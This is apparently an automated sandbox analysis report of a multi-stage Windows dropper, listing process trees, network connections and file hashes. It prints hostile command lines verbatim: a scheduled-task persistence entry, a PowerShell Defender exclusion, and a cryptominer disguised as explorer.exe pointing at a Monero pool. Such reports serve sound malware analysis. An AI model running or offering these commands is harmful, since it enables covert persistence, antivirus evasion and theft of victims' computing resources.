PID 264 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe
PID 264 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe
PID 264 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe
PID 1772 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe
PID 1772 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe
PID 1772 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe
PID 2088 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
PID 2088 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
PID 2088 wrote to memory of 3648 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
PID 3252 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 3252 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe
PID 3252 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3252 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3252 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 3648 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
PID 3648 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
PID 3648 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c caa4baaf544.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 621c13b77.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe

e4f0738cc5646a38.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe

caa4baaf544.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe

c0f099be1ace2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe

3d1f9c2a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe

6f1aa71747b4a291.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe

24ebc9ce784c63.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe

621c13b77.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe

d55cc0d45c3a05.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

09b9624c6ac9.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3016 -ip 3016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 556

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe" -a

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487159 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3312 -ip 3312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2380 -ip 2380

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 1072

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb24c746f8,0x7ffb24c74708,0x7ffb24c74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 41.13.2.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
N/A 127.0.0.1:63098 tcp
N/A 127.0.0.1:63100 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
DE 51.195.43.17:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 pastebin.com udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 17.43.195.51.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 146.59.154.106:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 106.154.59.146.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3016-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-44-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3016-43-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3016-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-38-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-36-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-40-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-34-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3016-33-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3016-32-0x00000000013F0000-0x000000000147F000-memory.dmp

memory/3016-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3016-27-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

memory/4800-97-0x0000000000F60000-0x0000000000F8C000-memory.dmp

memory/3252-100-0x00000000002F0000-0x00000000003DE000-memory.dmp

memory/4800-103-0x0000000003110000-0x0000000003130000-memory.dmp

memory/1000-104-0x0000000000800000-0x0000000000942000-memory.dmp

memory/1000-107-0x0000000005260000-0x00000000052F2000-memory.dmp

memory/1000-106-0x0000000005770000-0x0000000005D14000-memory.dmp

memory/4800-105-0x0000000003140000-0x0000000003146000-memory.dmp

